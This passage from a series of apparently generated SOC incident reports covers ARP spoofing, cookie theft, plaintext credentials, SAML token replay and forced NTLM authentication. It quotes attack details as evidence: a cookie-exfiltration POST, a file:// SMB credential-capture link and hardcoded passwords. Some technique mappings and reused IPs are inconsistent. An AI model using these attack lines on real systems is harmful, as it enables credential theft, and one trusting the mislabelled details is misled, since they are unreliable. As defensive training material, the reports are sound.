Data Exposure: 47 passwords exfiltrated; all rotated.
Financial Impact: Minimal.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
All exposed passwords rotated.
User educated.
Technical Controls Enhanced:
Blocked browser password storage via GPO (enforce password manager use).
Implemented application control (CrowdStrike Falcon Prevent).
Created alert for any process accessing browser credential stores.
8. Conclusion:
A user downloaded and executed a credential theft tool that extracted 47 saved passwords from Chrome and exfiltrated them. Defender detected the tool, but exfiltration occurred first. All exposed passwords were rotated.
Closure Rationale: All credentials rotated; malicious tool removed; browser storage disabled.
Analyst: [Walter White], SOC Analyst Date: 2024-02-21 12:30 EST
69. T1557 – Adversary-in-the-Middle (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-AITM-1557-7842 Alert Time: 2024-02-21 16:30:45 EST Severity: CRITICAL (95/100) Source: Darktrace Enterprise Immune System Rule: “ARP Spoofing Detected – Potential Man-in-the-Middle Attack” MITRE ATT&CK: T1557.002 – Adversary-in-the-Middle: ARP Cache Poisoning
Alert Details:
Detection: ARP cache poisoning activity on internal network
Time: 16:25-16:30 EST Network Segment: VLAN 45 (Finance Department)
ARP Anomalies Detected:
16:25:15 – ARP reply from 192.168.45.78 claiming to be 192.168.45.1 (gateway)
16:25:30 – ARP reply from same MAC claiming to be 192.168.45.10 (DNS server)
16:25:45 – ARP reply claiming to be 192.168.45.20 (file server)
Multiple ARP replies from single host for multiple IPs
Source Details:
Source MAC: 00:1A:2B:3C:4D:5E
Source IP: 192.168.45.78
Hostname: Unknown (not in asset inventory)
Location: Finance department (physical access?)
Traffic Analysis:
After poisoning, traffic from finance workstations to gateway was redirected
Traffic passed through 192.168.45.78 before reaching destination
SSL traffic was downgraded to HTTP for some connections
Credentials captured for: webmail.company.com, portal.company.com
Detection Logic:
Single host claiming multiple IPs via ARP (impossible under normal conditions)
Traffic redirection pattern consistent with ARP spoofing
SSL downgrade attacks observed
Pattern matches active Man-in-the-Middle attack
Additional Context:
Unknown device on network (not in CMDB)
Possibly rogue device plugged into network jack
Attack targeting Finance department for credential theft
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace alert
Darktrace Console
Confirmed ARP spoofing attack in progress
2. Physical Security
Dispatch security to location
Security Team, Badge Logs
Unknown individual in Finance area with laptop
3. Network Isolation
Block switch port for 192.168.45.78
Cisco ISE
Port disabled; attacker disconnected
4. MAC Blocking
Block MAC address at network level
Cisco ISE, MAC filtering
MAC 00:1A:2B:3C:4D:5E blocked
5. Credential Check
Identify users whose traffic was intercepted
Darktrace, Network Logs
3 users had credentials captured
6. Password Reset
Reset affected users’ passwords
Azure AD, AD
All 3 passwords reset
Jira Incident Report
Ticket: SOC-2024-109 Summary: T1557 – ARP Spoofing Attack in Finance Department Status: RESOLVED Resolution: MALICIOUS – Attacker Removed, Credentials Reset Priority: P1 – CRITICAL Labels: T1557, adversary-in-the-middle, arp-spoofing, darktrace, physical-access Components: Network-Security, Physical-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “ARP Spoofing Detected – Potential Man-in-the-Middle Attack”.
Location: Finance Department, VLAN 45.
Attacker Device: Unknown laptop, MAC 00:1A:2B:3C:4D:5E, IP 192.168.45.78.
Time: 2024-02-21 16:30 EST.
Technique: MITRE ATT&CK T1557.002 – Adversary-in-the-Middle: ARP Cache Poisoning.
2. Technical Analysis:
Attack Chain:
16:00 – Unknown individual enters Finance department (piggybacked through secured door)
16:05 – Individual plugs laptop into network jack in empty cubicle
16:10 – Laptop begins ARP spoofing attack
16:10-16:30 – Attacker poisons ARP caches of finance workstations
16:15-16:30 – Traffic redirected through attacker’s laptop
16:20-16:25 – SSL downgrade attacks on webmail and portal
16:25-16:30 – Credentials captured for 3 users
16:30 – Darktrace detects anomaly
ARP Spoofing Technique:
Normal: Each IP maps to one MAC address
Attack: Attacker sends ARP replies claiming multiple IPs
Result: Workstations send traffic to attacker instead of real gateway
Effect: Attacker can see/modify all traffic
Credentials Captured:
User 1: jdoe@company.com (password captured for webmail)
User 2: bsmith@company.com (password captured for portal)
User 3: kwilson@company.com (password captured for both)
Traffic Intercepted:
Webmail (HTTPS downgraded to HTTP)
Company portal (HTTPS downgraded)
File server access (SMB – not captured)
No sensitive financial data transferred during window
3. Investigation Findings:
Timeline:
16:00 – Attacker enters building
16:05 – Laptop connected
16:10-16:30 – ARP spoofing
16:30 – Darktrace alert
16:32 – SOC investigates
16:35 – Security dispatched
16:38 – Attacker seen leaving (abandoned laptop)
16:40 – Switch port disabled
16:45 – Laptop recovered by security
Physical Evidence:
Laptop abandoned (attacker fled)
Laptop had ARP spoofing tools installed
Captured credentials found on laptop
No identification on device
Indicators of Compromise (IoCs):
Network:
– Attacker MAC: 00:1A:2B:3C:4D:5E
– Attacker IP: 192.168.45.78
Physical:
– Location: Finance Department, cubicle 45B
– Time: 16:00-16:40
4. Containment Actions:
Immediate Actions:
Disabled switch port for 192.168.45.78.
Blocked MAC address at network level.
Security confiscated abandoned laptop.
Reset passwords for 3 affected users.
Network Remediation:
Flushed ARP caches on all finance workstations.
Implemented dynamic ARP inspection on switches.
Enabled DHCP snooping.
Physical Security:
Reviewed badge access logs (found piggybacking incident).
Increased security presence in Finance area.
Implemented mantraps at secure entrances.
5. Root Cause Analysis:
Primary Cause: Physical security breach allowing unauthorized access.
Contributing Factors:
No dynamic ARP inspection on network.
Piggybacking allowed through secure door.
Empty cubicle accessible to visitors.
6. Business Impact:
Operational Impact: Finance network stabilized; no downtime.
Data Exposure: 3 user credentials captured (all reset).
Physical Security: Process failure identified.
7. Remediation & Prevention:
Completed Actions:
Attacker removed.
Credentials reset.
Laptop confiscated.
Technical Controls Enhanced:
Enabled dynamic ARP inspection on all switches.
Implemented DHCP snooping.
Deployed 802.1X authentication for all network ports.
Added mantraps to secure entrances.
8. Conclusion:
An attacker gained physical access to the Finance department and performed an ARP spoofing attack, capturing credentials for 3 users. Darktrace detected the anomalous ARP activity within minutes, enabling rapid response. The attacker fled but abandoned the laptop.
Closure Rationale: Attacker removed; credentials reset; network and physical controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-21 17:30 EST
70. T1539 – Steal Web Session Cookie (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-COOKIE-STEAL-1539-7842 Alert Time: 2024-02-21 10:30:22 EST Severity: HIGH (88/100) Source: Zscaler Internet Access (ZIA) Rule: “Suspicious Outbound Traffic – Session Cookie Exfiltration” MITRE ATT&CK: T1539 – Steal Web Session Cookie
Alert Details:
Detection: Outbound traffic containing session cookies to suspicious destination
User: rpatel@company.com (Raj Patel, Engineer) Source IP: 192.168.78.45 (Internal) Destination: 185.143.221[.]89:8080 (Bulgaria) Time: 10:25-10:30 EST
Traffic Analysis:
HTTP POST request to http://185.143.221[.]89:8080/collect
POST data contains multiple session cookies:
Cookie: ASP.NET_SessionId=abc123def456 (company portal)
Cookie: .AspNet.Cookies=ghi789jkl012 (Office 365)
Cookie: JSESSIONID=mnop345qrs678 (Confluence)
Cookie: sessionid=tuv901wxy234 (Jira)
Plus 8 additional cookies
Request Details:
User-Agent: Mozilla/5.0 (compatible; CookieThief/1.0)
Referer: http://evil-site.com/stealer.js
Content-Type: application/x-www-form-urlencoded
Additional Context:
User rpatel visited compromised website earlier
Site contained JavaScript that stole cookies
Cookies valid for active sessions
Destination IP known for credential theft
Detection Logic:
Outbound traffic containing multiple session cookies
Destination not a legitimate cloud service
User-Agent indicates cookie stealing tool
Pattern matches session hijacking preparation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed cookie exfiltration to malicious IP
2. Session Termination
Force logout all applications
Azure AD, Okta, Application Logs
All active sessions terminated
3. Cookie Invalidation
Clear server-side sessions
IT Ops Team
All sessions invalidated
4. User Notification
Contact rpatel
Teams, Phone
User logged out; password reset
5. Source Investigation
Identify compromised site
Zscaler, Web Logs
User visited forum with malicious ad
6. IP Blocking
Block destination IP
Zscaler, Palo Alto
IP 185.143.221[.]89 blocked
Jira Incident Report
Ticket: SOC-2024-110 Summary: T1539 – Web Session Cookies Exfiltrated via Malicious JavaScript Status: RESOLVED Resolution: MALICIOUS – Sessions Terminated Priority: P2 – MEDIUM Labels: T1539, session-cookie, cookie-theft, zscaler, session-hijacking Components: Web-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA).
Alert: “Suspicious Outbound Traffic – Session Cookie Exfiltration”.
User: rpatel@company.com (Engineering Department).
Destination: 185.143.221[.]89:8080.
Time: 2024-02-21 10:30 EST.
Technique: MITRE ATT&CK T1539 – Steal Web Session Cookie.
2. Technical Analysis:
Attack Chain:
10:00 – User visits engineering forum (forum.techhelp.com)
10:01 – Forum page contains malicious ad (injected via compromised ad network)
10:01 – Ad loads JavaScript from evil-site.com/stealer.js
10:02 – JavaScript runs in user’s browser
10:02 – Script enumerates all cookies from browser storage
10:03 – Script collects 13 session cookies
10:03 – Script sends cookies to 185.143.221[.]89:8080
10:05-10:30 – Attacker has valid session cookies
10:30 – Zscaler detects and alerts
Cookies Exfiltrated:
Company portal (ASP.NET_SessionId) – valid 30 minutes
Office 365 (.AspNet.Cookies) – valid 60 minutes
Confluence (JSESSIONID) – valid 2 hours
Jira (sessionid) – valid 2 hours
Salesforce (sid) – valid 1 hour
8 additional application cookies
Attacker Activity (based on logs):
10:04 – Accessed company portal using stolen cookie
10:05 – Viewed 3 documents
10:06 – Accessed Jira, viewed 2 tickets
10:07-10:30 – No further activity (possibly preparing)
No data downloaded
Malicious JavaScript:
URL: hxxp://evil-site.com/stealer.js
Function: document.cookie access, exfiltration via AJAX
Obfuscated to evade detection
3. Investigation Findings:
Timeline:
10:00 – User visits forum
10:02 – Cookies stolen
10:03 – Exfiltration
10:04-10:07 – Attacker accesses applications
10:30 – Zscaler alert
10:32 – SOC investigates
10:35 – All sessions terminated
10:36 – User logged out
Indicators of Compromise (IoCs):
Network:
– Exfiltration IP: 185.143.221[.]89:8080
– Malicious Script: hxxp://evil-site.com/stealer.js
– Compromised Site: forum.techhelp.com
Cookies:
– Multiple session cookies (all invalidated)
4. Containment Actions:
Immediate Actions:
Terminated all active sessions for user rpatel.
Invalidated all server-side sessions for affected applications.
Forced user logout from all applications.
Blocked exfiltration IP at firewall and Zscaler.
User Remediation:
Reset user password.
Cleared browser cache and cookies.
User educated on malicious ads.
Application Review:
Checked application logs for unauthorized access.
No data exfiltration confirmed.
No privilege escalation observed.
5. Root Cause Analysis:
Primary Cause: User visited compromised forum with malicious ad.
Contributing Factors:
Ad network security weak (allowed malicious script).
Session cookies not tied to IP/browser fingerprint.
No additional verification for session usage.
6. Business Impact:
Operational Impact: Engineering user offline for 1 hour.
Data Exposure: 3 documents and 2 Jira tickets viewed; no exfiltration.
Reputational Impact: None.
7. Remediation & Prevention:
Completed Actions:
Sessions terminated.
User logged out.
IP blocked.
Cookies invalidated.
Technical Controls Enhanced:
Implemented IP binding for session cookies (where supported).
Enabled additional session verification (user agent, IP consistency).
Deployed script blocking (NoScript, uBlock Origin) via GPO.
Enhanced Zscaler policy to block known malicious ad domains.
8. Conclusion:
A user visited a compromised forum where a malicious ad stole session cookies and exfiltrated them. The attacker briefly accessed applications before detection. Zscaler detected the cookie exfiltration, enabling session termination within minutes. No data was exfiltrated.
Closure Rationale: Sessions terminated; user secured; cookie exfiltration blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-21 11:30 EST
End of Batch 14
Ready for your next batch of prompts whenever you are.
Batch 15: Credential Access & Defense Evasion Incident Reports
Here are the next 5 detailed SOC incident reports.
71. T1552 – Unsecured Credentials (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-CREDS-1552-7842 Alert Time: 2024-02-22 09:30:15 EST Severity: HIGH (88/100) Source: Varonis Data Security Platform Rule: “Sensitive Keywords Found in File – Potential Password Exposure” MITRE ATT&CK: T1552.001 – Unsecured Credentials: Credentials in Files
Alert Details:
Detection: File containing plaintext credentials discovered on file share
File Details:
Path: \filesrv\shared\IT\backup_scripts\sql_backup.ps1
Owner: jsmith (IT Administrator)
Last Modified: 2024-02-21 22:15 EST
File Size: 4.2 KB
Sensitivity Score: 95/100 (Critical)
File Content (excerpt):
# SQL Backup Script
$sqlServer = “SQL-PROD-01”
$database = “FinanceDB”
$username = “sa”
$password = “P@ssw0rd123!” # CRITICAL: Plaintext password
$backupPath = “\\backupsrv\sql\finance.bak”
# Domain Admin credentials for backup service
$domainAdmin = “corp\svc_backup”
$domainPass = “Backup2024!” # CRITICAL: Domain account password
# Connect and run backup
Invoke-SqlBackup -Server $sqlServer -Database $database -Username $username -Password $password -Path $backupPath
Additional Findings:
File accessible to “Domain Users” group (2,500+ users)
File accessed by 3 users in last 24 hours (potentially compromised)
Contains credentials for:
SQL SA account (full database admin)
Domain service account (svc_backup) with backup privileges
No encryption or secure storage used
Detection Logic:
File contains keywords “password”, “pwd”, “pass” followed by plaintext
File on open share (excessive permissions)
Contains privileged account credentials
Pattern matches credential harvesting target
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Varonis findings
Varonis Console
Confirmed plaintext credentials in PowerShell script
2. File Remediation
Remove/move file to secure location
File Server Admin
File moved to secure IT share; permissions restricted
3. Credential Rotation
Reset exposed passwords
Azure AD, SQL Admin
SQL SA password rotated; svc_backup password reset
4. Access Investigation
Identify users who accessed file
Varonis, File Server Logs
3 users accessed file; all investigated
5. User Notification
Notify file owner (jsmith)
Email, Teams
jsmith counseled on secure credential storage
6. Policy Update
Update secure coding guidelines
Documentation, Training
New policy: No plaintext credentials in scripts
Jira Incident Report
Ticket: SOC-2024-111 Summary: T1552 – Plaintext Credentials Found in PowerShell Script on File Share Status: RESOLVED Resolution: INFORMATION EXPOSURE – Remediated Priority: P2 – MEDIUM Labels: T1552, unsecured-credentials, plaintext-passwords, varonis, file-share Components: Data-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Sensitive Keywords Found in File – Potential Password Exposure”.
File: \filesrv\shared\IT\backup_scripts\sql_backup.ps1.
Owner: jsmith (IT Administrator).
Time: 2024-02-22 09:30 EST.
Technique: MITRE ATT&CK T1552.001 – Unsecured Credentials: Credentials in Files.
2. Technical Analysis:
Exposure Details:
File Type: PowerShell backup script
Location: Open file share accessible to all domain users (2,500+)
Contents: Two plaintext passwords:
SQL SA account: P@ssw0rd123! (full database admin)
Domain service account: Backup2024! (backup privileges)
Access History:
File accessed by 3 users in last 24 hours:
jsmith (owner) – legitimate
bturner (finance) – accessed 3 times (investigating)
rpatel (engineering) – accessed 2 times (investigating)
No evidence of data exfiltration (DLP logs clean)
Risk Assessment:
SQL SA account: Full access to all databases (customer data, financials)
svc_backup account: Can backup all domain data (including NTDS.dit)
Combined exposure: Potential for complete domain compromise
File Owner Response:
jsmith created script for legitimate backup automation
Used plaintext for convenience (violates policy)
Unaware of file share permissions
3. Investigation Findings:
Timeline:
02-21 22:15 – Script created/modified
02-22 09:30 – Varonis alert
09:32 – SOC investigates
09:35 – File secured
09:40 – Passwords rotated
Indicators of Compromise (IoCs):
File:
– \\filesrv\shared\IT\backup_scripts\sql_backup.ps1 (now secured)
Credentials:
– SQL SA: P@ssw0rd123! (rotated)
– svc_backup: Backup2024! (rotated)
Access:
– bturner (under investigation)
– rpatel (under investigation)
4. Containment Actions:
Immediate Actions:
Moved file to restricted IT share (IT admins only).
Removed access for Domain Users group.
Reset SQL SA password.
Reset svc_backup password.
User Investigation:
Interviewed bturner and rpatel.
Both accessed file accidentally while browsing shares.
No malicious intent; no data exfiltration.
Educated on security awareness.
Script Remediation:
Removed plaintext passwords from script.
Implemented secure credential storage (Windows Credential Manager).
Updated backup process.
5. Root Cause Analysis:
Primary Cause: IT admin stored plaintext credentials in script on open share.
Contributing Factors:
No secure credential storage policy.
File share permissions overly permissive.
No scanning for exposed credentials (until Varonis).
6. Business Impact:
Operational Impact: None (credentials rotated before misuse).
Data Exposure: Potential for credential theft; none confirmed.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
File secured.
Passwords rotated.
Users educated.
Technical Controls Enhanced:
Deployed Varonis scanning for all file shares.
Implemented secure credential storage policy.
Restricted file share permissions to least privilege.
Created automated alert for any files containing “password” + plaintext.
8. Conclusion:
An IT administrator stored plaintext credentials for privileged accounts in a PowerShell script on an open file share. Varonis detected the exposure before any compromise occurred. Credentials were rotated, and the file was secured.
Closure Rationale: File secured; credentials rotated; policy updated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 10:30 EST
72. T1606 – Forge Web Credentials (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-TOKEN-FORGE-1606-7842 Alert Time: 2024-02-22 14:15:33 EST Severity: CRITICAL (98/100) Source: Azure AD Identity Protection Rule: “Suspicious Token Usage – Anomaly Detected” MITRE ATT&CK: T1606.002 – Forge Web Credentials: SAML Tokens
Alert Details:
Detection: Suspicious SAML token usage from untrusted location
User: kwilson@company.com (Karen Wilson – Finance Manager) Time: 14:10 EST
Token Details:
Token Type: SAML (Security Assertion Markup Language)
Issuer: company.com (legitimate)
Audience: https://portal.company.com
Issue Time: 14:05 EST
Expiration Time: 14:35 EST (30 minutes)
Claims: User=kwilson, Role=FinanceAdmin, MFA=True
Usage Details:
First Usage: 14:10 EST from IP 45.134.225[.]78 (Bulgaria)
Second Usage: 14:11 EST from IP 185.143.221[.]89 (Bulgaria)
Third Usage: 14:12 EST from IP 194.165.16[.]89 (Romania)
Fourth Usage: 14:13 EST from IP 192.168.45.78 (internal – engineering host)
Anomaly Detection:
Token created at 14:05 from legitimate user location (New York)
Token used from Bulgaria 5 minutes later (impossible travel)
Token used from 4 different IPs in 4 minutes (impossible for single user)
Token claims include MFA=True, but no MFA challenge at time of use
Pattern matches SAML token theft and replay
Additional Context:
User kwilson reported “strange login notifications” at 14:05
User did NOT log in at that time
Token likely stolen from browser session or intercepted
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Azure AD alert
Azure AD Identity Protection
Confirmed SAML token replay attack
2. Immediate Action
Revoke all user tokens
Azure AD PowerShell
All tokens for kwilson revoked
3. User Session Termination
Force logout all sessions
Azure AD
User logged out everywhere
4. Password Reset
Reset user password
Azure AD
Password reset; MFA re-enrolled
5. Investigation
Determine token source
Browser History, EDR
Token stolen via malicious browser extension
6. Host Remediation
Clean infected workstation
CrowdStrike
Malicious extension removed
Jira Incident Report
Ticket: SOC-2024-112 Summary: T1606 – SAML Token Theft and Replay Attack Status: RESOLVED Resolution: MALICIOUS – Tokens Revoked Priority: P1 – CRITICAL Labels: T1606, forge-web-credentials, saml-token, token-theft, azure-ad Components: Identity-Management, Cloud-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection.
Alert: “Suspicious Token Usage – Anomaly Detected”.
User: kwilson@company.com (Finance Manager).
Time: 2024-02-22 14:15 EST.
Technique: MITRE ATT&CK T1606.002 – Forge Web Credentials: SAML Tokens.
2. Technical Analysis:
Attack Chain:
13:45 – User visits compromised website (finance blog)
13:46 – Site contains malicious browser extension installer (drive-by)
13:47 – Extension installed without user knowledge
13:48 – Extension monitors browser traffic
14:05 – User logs into company portal legitimately
14:05 – SAML token issued (valid 30 minutes)
14:05 – Extension steals token from browser storage
14:06 – Token exfiltrated to attacker C2
14:10-14:13 – Attacker replays token from multiple IPs
14:15 – Azure AD detects anomalous usage
Token Replay Details:
IP 45.134.225[.]78: Accessed financial reports (read-only)
IP 185.143.221[.]89: Accessed vendor payment portal
IP 194.165.16[.]89: Attempted wire transfer (blocked – required second approver)
IP 192.168.45.78: Accessed internal wiki (reconnaissance)
Malicious Browser Extension:
Name: “Google Docs Offline Helper” (masquerading)
Permissions: Read all data on websites
Behavior: Exfiltrates tokens, cookies, session data
Source: Chrome Web Store (removed after report)
User Activity:
User reported “strange login notifications” at 14:05
Did not authorize any logins from unusual locations
3. Investigation Findings:
Timeline:
13:45-13:48 – Extension installed
14:05 – Legitimate login, token stolen
14:06 – Token exfiltrated
14:10-14:13 – Attacker activity
14:15 – Alert triggers
14:17 – SOC investigates
14:18 – All tokens revoked
14:19 – User forced logout
Attacker Activity Assessment:
Viewed 3 financial reports (no sensitive data)
Accessed vendor payment portal (no transactions)
Attempted wire transfer (blocked by dual control)
No data downloaded
Indicators of Compromise (IoCs):
Network:
– Attacker IPs: 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89, 192.168.45.78
Browser Extension:
– Name: “Google Docs Offline Helper”
– ID: gdoc-helper-12345
Token:
– SAML token for kwilson (now revoked)
4. Containment Actions:
Immediate Actions:
Revoked all active tokens for kwilson.
Force logout from all applications.
Reset user password.
Re-enrolled MFA.
Host Remediation:
Removed malicious browser extension.
Cleared browser cache and cookies.
Full scan (no other malware).
Application Review:
Checked financial systems for unauthorized transactions (none).
Reviewed vendor payment logs (none).
5. Root Cause Analysis:
Primary Cause: User installed malicious browser extension.
Contributing Factors:
Extension allowed excessive permissions.
No extension allowlist/blocklist in place.
User unaware of extension risks.
6. Business Impact:
Operational Impact: Finance manager offline for 2 hours.
Financial Impact: None (wire transfer blocked).
Data Exposure: 3 financial reports viewed; no exfiltration.
7. Remediation & Prevention:
Completed Actions:
Tokens revoked.
Extension removed.
User educated.
Attacker blocked.
Technical Controls Enhanced:
Implemented Chrome extension allowlist (only approved extensions).
Enabled token binding (where supported).
Enhanced Azure AD token protection (conditional access policies).
Deployed browser isolation for high-risk users.
8. Conclusion:
An attacker used a malicious browser extension to steal a SAML token from a Finance manager and replay it from multiple locations. Azure AD detected the anomalous token usage within minutes. All tokens were revoked before significant damage occurred.
Closure Rationale: Tokens revoked; extension removed; user secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 15:30 EST
73. T1187 – Forced Authentication (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-FORCED-AUTH-1187-7842 Alert Time: 2024-02-22 11:30:22 EST Severity: HIGH (85/100) Source: Microsoft Defender for Identity Rule: “Suspicious Network Connection – Potentially Forced Authentication” MITRE ATT&CK: T1187 – Forced Authentication
Alert Details:
Detection: Outbound SMB connection to attacker-controlled server (potentially for NTLM relay)
Host: ENG-WS-078 (Engineering Workstation) User: alexchen (Alex Chen, Engineer) Time: 11:25 EST
Connection Details:
Source: 192.168.78.45 (ENG-WS-078)
Destination: 185.143.221[.]89:445 (SMB)
Protocol: SMB (Server Message Block)
Authentication: NTLMv2 (initiated by client)
Status: Connection established
Process Details:
Process: explorer.exe (PID: 2341)
Thread: Opened file from UNC path: \185.143.221[.]89\share\document.pdf
User: alexchen (authenticating automatically)
Additional Events:
11:24: User received email with link: file://\\185.143.221[.]89\share\document.pdf
11:24: User clicked link
11:25: Explorer.exe attempted to connect to remote SMB share
11:25: NTLM authentication initiated (user’s credentials sent)
11:25: MDI detects suspicious outbound SMB
Detection Logic:
Outbound SMB to external IP (unusual – SMB typically internal)
Destination IP known for malicious activity
User initiated connection via file:// link
Pattern matches “forced authentication” (NTLM relay) attack
Threat Intelligence:
IP 185.143.221[.]89 known for NTLM relay attacks
Technique: Force user to authenticate to attacker server
Attacker relays NTLM hash to authenticate to other services
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed forced authentication attempt
2. Network Block
Block outbound SMB to external IP
Palo Alto Firewall
SMB to 185.143.221[.]89 blocked
3. User Notification
Contact user immediately
Teams, Phone
User warned; credential reset initiated
4. Credential Reset
Reset user password
Azure AD, AD
Password reset; MFA enforced
5. Relay Check
Check if credentials were used elsewhere
Azure AD Logs, SIEM
No subsequent logins from attacker IP
6. Email Investigation
Find source email
Proofpoint, Exchange
Email quarantined; sender blocked
Jira Incident Report
Ticket: SOC-2024-113 Summary: T1187 – Forced Authentication Attempt via Malicious SMB Link Status: RESOLVED Resolution: MALICIOUS – Authentication Blocked Priority: P2 – MEDIUM Labels: T1187, forced-authentication, ntlm-relay, mdi, phishing Components: Network-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Network Connection – Potentially Forced Authentication”.
Host: ENG-WS-078 (Engineering Department, user alexchen).
Destination: 185.143.221[.]89:445 (SMB).
Time: 2024-02-22 11:30 EST.
Technique: MITRE ATT&CK T1187 – Forced Authentication.
2. Technical Analysis:
Attack Chain:
11:20 – User receives phishing email from “security@company-update[.]net”
11:21 – Email contains link: file://\\185.143.221[.]89\share\document.pdf
11:22 – User clicks link (expecting PDF document)
11:22 – Windows Explorer attempts to connect to remote SMB share
11:22 – NTLM authentication automatically triggered (user’s credentials sent)
11:23 – Connection established to attacker server
11:23 – Attacker receives NTLM hash
11:25 – MDI detects and alerts
Forced Authentication Technique:
Method: File:// link to remote SMB share
Why it works: Windows automatically sends current user credentials when accessing network resources
Attacker Goal: Capture NTLM hash for relay or offline cracking
Attacker Capabilities with NTLM Hash:
Could relay to other services (if SMB signing not required)
Could attempt offline cracking (weak password)
Could use for Pass-the-Hash attacks
User Password Strength:
Password: “Summer2024!” (moderate complexity)
Crackable offline (estimated 2-3 days)
3. Investigation Findings:
Timeline:
11:20 – Phishing email received
11:22 – User clicks link
11:22-11:23 – NTLM hash sent
11:25 – MDI alert
11:27 – SOC investigates
11:28 – User contacted
11:29 – SMB blocked
11:30 – Password reset initiated
Indicators of Compromise (IoCs):
Network:
– Attacker SMB server: 185.143.221[.]89:445
– SMB share: \\185.143.221[.]89\share\
Email:
– Sender: security@company-update[.]net
– Link: file://\\\\185.143.221[.]89\share\document.pdf
User:
– alexchen (credentials potentially compromised)
4. Containment Actions:
Immediate Actions:
Blocked outbound SMB to external IP at firewall.
Reset user password.
Enforced MFA (if not already enabled).
Quarantined email from all mailboxes.
Credential Monitoring:
Checked Azure AD logs for any logins from attacker IP (none).
Checked for any suspicious activity using alexchen account (none).
User Remediation:
User educated on file:// links and forced authentication risks.
5. Root Cause Analysis:
Primary Cause: User clicked malicious file:// link in phishing email.
Contributing Factors:
Outbound SMB allowed to internet (should be blocked).
User unaware of forced authentication technique.
NTLM enabled (legacy protocol).
6. Business Impact:
Operational Impact: Engineer offline for 1 hour (password reset).
Data Exposure: NTLM hash captured; password reset before cracking.
7. Remediation & Prevention:
Completed Actions:
Password reset.
SMB blocked.
User educated.
Technical Controls Enhanced:
Blocked outbound SMB to internet (firewall rule).
Disabled NTLM where possible (migrated to Kerberos).
Enabled SMB signing to prevent relay.
Created email filtering rule for file:// links.
8. Conclusion:
An attacker used a phishing email with a file:// SMB link to force a user to authenticate to an external server, capturing their NTLM hash. MDI detected the outbound SMB connection, enabling password reset before the hash could be cracked or relayed.
Closure Rationale: Password reset; SMB blocked; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 12:30 EST
74. T1556 – Modify Authentication Process (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-AUTH-MOD-1556-7842 Alert Time: 2024-02-22 16:30:45 EST Severity: CRITICAL (98/100) Source: CrowdStrike Falcon EDR Rule: “Authentication DLL Injection – Potential Credential Theft” MITRE ATT&CK: T1556.003 – Modify Authentication Process: Pluggable Authentication Modules
Alert Details:
Detection: Suspicious DLL injected into LSASS process
Host: DC-01 (Primary Domain Controller) User: SYSTEM Time: 16:25 EST
Process Details:
Target Process: lsass.exe (PID: 568) – Local Security Authority Subsystem Service
PID: 568
Suspicious DLL: C:\Windows\System32\winlogon.dll (modified version)
Original DLL Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current DLL Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: 16:20 EST
API Calls:
LsaRegisterLogonProcess (registered rogue authentication package)
LsaApLogonUser (hooking logon attempts)
LsaApCallPackage (intercepting authentication)
Detection Logic:
winlogon.dll is not a legitimate LSASS-loaded DLL (suspicious)
DLL hash mismatch (modified)
DLL intercepts authentication calls
Pattern matches credential theft via authentication package
Additional Context:
Domain Controller (critical infrastructure)
LSASS handles all authentication for domain
Compromise would give attacker all domain credentials
Threat Intelligence:
Technique known as “SSP (Security Support Provider) hijacking”
Attacker can capture plaintext passwords during logon
Requires admin privileges to install
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed malicious DLL loaded into LSASS
2. Immediate Action
Isolate Domain Controller
CrowdStrike, Network ACLs
DC-01 quarantined
3. DLL Removal
Remove malicious winlogon.dll
CrowdStrike Live Response
DLL deleted; restored from backup
4. LSASS Restart
Reboot Domain Controller
PowerShell Restart-Computer
LSASS restarted; clean state
5. Credential Reset
Force domain-wide password reset
AD, Azure AD
All domain passwords reset
6. Investigation
Determine source of compromise
EDR, SIEM
Attacker compromised admin account
Jira Incident Report
Ticket: SOC-2024-114 Summary: T1556 – Authentication Package Hijacking on Domain Controller Status: RESOLVED Resolution: MALICIOUS – Domain Controller Compromised, Cleaned Priority: P1 – CRITICAL Labels: T1556, modify-authentication, lsass, ssp-hijacking, crowdstrike Components: Identity-Management, Domain-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Authentication DLL Injection – Potential Credential Theft”.
Host: DC-01 (Primary Domain Controller).
Process: lsass.exe with malicious winlogon.dll loaded.
Time: 2024-02-22 16:30 EST.
Technique: MITRE ATT&CK T1556.003 – Modify Authentication Process: Pluggable Authentication Modules.
2. Technical Analysis:
Attack Chain:
